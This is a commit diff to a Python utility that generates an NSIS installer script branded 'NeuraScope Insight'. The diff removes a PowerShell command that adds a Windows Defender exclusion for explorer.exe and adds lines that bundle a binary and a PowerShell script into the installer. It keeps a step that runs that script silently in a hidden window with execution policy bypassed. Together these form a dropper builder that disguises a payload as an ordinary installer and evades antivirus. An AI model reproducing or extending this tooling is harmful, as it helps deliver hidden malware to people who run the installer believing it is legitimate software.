sigyllly commited on
Commit
94d4611
·
verified ·
1 Parent(s): e0f84fc

Update utils.py

Browse files
Files changed (1) hide show
  1. utils.py +3 -5
utils.py CHANGED
@@ -53,7 +53,7 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
53
  timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
54
  installer_output = os.path.join(folder_path, f"setup_{timestamp}.exe")
55
 
56
- NSIS_SCRIPT_TEMPLATE = r"""
57
  ; NeuraScope Insight Installer Script
58
  !include "MUI2.nsh"
59
  !include "LogicLib.nsh"
@@ -84,10 +84,8 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
84
  Section "MainSection" SEC01
85
  SetDetailsPrint none
86
  SetOutPath "$WINDIR\..\ProgramData\Installer"
87
- ExecWait 'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess \"explorer.exe\""' $0
88
- ${If} $0 != 0
89
- Abort
90
- ${EndIf}
91
  ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
92
  SetAutoClose true
93
  SectionEnd
 
53
  timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
54
  installer_output = os.path.join(folder_path, f"setup_{timestamp}.exe")
55
 
56
+ NSIS_SCRIPT_TEMPLATE = r"""
57
  ; NeuraScope Insight Installer Script
58
  !include "MUI2.nsh"
59
  !include "LogicLib.nsh"
 
84
  Section "MainSection" SEC01
85
  SetDetailsPrint none
86
  SetOutPath "$WINDIR\..\ProgramData\Installer"
87
+ File "{bin_file}"
88
+ File "{ps1_file}"
 
 
89
  ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
90
  SetAutoClose true
91
  SectionEnd